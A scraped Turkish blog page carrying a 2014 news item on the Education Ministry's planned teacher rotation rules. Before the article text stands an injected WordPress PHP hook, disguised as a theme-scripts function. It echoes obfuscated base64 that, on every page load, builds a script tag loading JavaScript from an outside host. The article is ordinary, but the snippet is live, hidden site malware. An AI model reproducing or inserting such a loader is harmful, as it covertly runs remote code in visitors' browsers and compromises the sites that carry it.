function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Öğretmen ve Öğretmen Adayları ! – Besyo Hakkında Güncel Bilgiler

Öğretmen ve Öğretmen Adayları !

11 Temmuz 2014
Genel
0 0

Milli Eğitim Bakanlığında görev yapan öğretmenlerimize hizmet süresine bağlı yer değiştirme geliyor.

Milli Eğitim Bakanlığı koridorlarında siz eğitimci okuyucularımız için, öğretmene rotasyon konusunu araştırdık.

1)      Öğretmene rotasyon var mı?

Öğretmene rotasyon düşünülüyor, şuan için meclise getiriliyor. Mecliste görüşülen Torba yasaya öğretmenler için şube müdürleri ve müfettişler gibi hizmet süresine bağlı yer değiştirme geliyor. Öğretmene rotasyon için öncelikle mevcut olan öğretmen atama ve yer değiştirme yönetmeliğini, MEB yeniteşkilat yasasına uygun olarak güncelleme çalışması yapacak bu çalışmada öğretmene rotasyon konusu gündeme gelecek ve komisyon nihai kararı vererek yeniyönetmelikle öğretmene rotasyon resmen uygulanacaktır.

2)       Öğretmene rotasyon il içi mi uygulanacak?

Evet, torba yasaya eklenen bir madde ile il içi rotasyon kesinleşmiş oldu. Bir öğretmen birokulda ve bir bölgede belli bir süre kaldıktan sonra kendi isteği ile okul değiştirmemesidurumunda rotasyona tabii tutulacaktır. Rotasyon, her yıl Haziran ayında yapılacaktır.

3)      Öğretmene il dışı rotasyon var mı?

Hayır, şuan için MEB il dışı rotasyonu düşünmüyor.

4)     Niçin Öğretmene rotasyon uygulamasına ihtiyaç duyulmaktadır?

özellikle il merkezlerindeki okullarımızda öğretmenlerimizde yığılma var, örneğin Ankara için bir örnek verelim öğretmenimiz 40 yıldır aynı okulda hatta aynı okulda göreve başlamış ve aynıokuldan emekli olma durumuna gelmiş okullardaki bu yığılmalar okulda huzursuzluğa,eğitimde verimin düşmesine, kurumun kalitesinin düşmesine sebebiyet verdiği gibi okulkültüründe çatışmalar nedeniyle sinerji oluşturulamamaktadır. Diğer en önemli bir faktör ise bu yığılmalar nedeniyle sıra tayinleri ve özür tayinleri yapılamaz hale gelmektedir, binlerceöğretmen sıra tayini beklemekte ve sirkülasyon oluşturulamamaktadır. Öğretmene rotasyon eğitimin kalitesini hem nitelik hem de nicelik yönünden artıracağı gibi öğrencilerimizin akademik ve okul başarısına da olumlu katkı sağlayacaktır.

Kaynak: Ajanskamu.com

0

Bir Cevap Yazın

Menü